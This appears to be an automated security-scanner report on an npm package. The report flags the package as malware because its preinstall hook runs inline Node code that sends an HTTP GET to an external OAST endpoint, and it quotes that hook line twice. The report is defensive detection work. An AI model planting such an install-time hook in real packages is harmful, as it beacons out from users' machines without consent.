AI Security Review
scanned 2h ago · by lpm-firewall-aiInstalling the package automatically makes an outbound HTTP request. The request executes before installation completes without a user command beyond installing the package.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm installation, via the `preinstall` lifecycle hook
Impact
Unconsented network beaconing during dependency installation; can expose installer IP and confirm installation execution.
Mechanism
Install-time Node HTTP request to a third-party OAST endpoint
Attack narrative
A package install invokes the `preinstall` command in `package.json`, which executes inline Node code and sends an HTTP GET request to an external OAST endpoint. This is an automatic outbound beacon unrelated to normal package functionality and occurs before installation completes.
Rationale
Direct source inspection confirms an unsolicited install-time external network request. The package contains no legitimate implementation that would justify this behavior.
Evidence
package.json
Network endpoints1
w635fyvrqkfmh9wc9uw8444cp3vujl7a.oastify.com
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines an npm `preinstall` hook.
- The hook runs Node code during installation.
- It performs an unsolicited HTTP GET to an OAST host.
- The package description identifies it as a security PoC.
Evidence against
- No additional package source files are present.
- No credential harvesting, file writes, or shell execution were found beyond the lifecycle hook.
Behavioral surface
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.preinstall = node -e "const http = require('http'); http.get('http://[redacted].oastify.com')"
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.preinstall = node -e "const http = require('http'); http.get('http://[redacted].oastify.com')"
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgFindings
1 Critical1 High1 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
LowScripts Present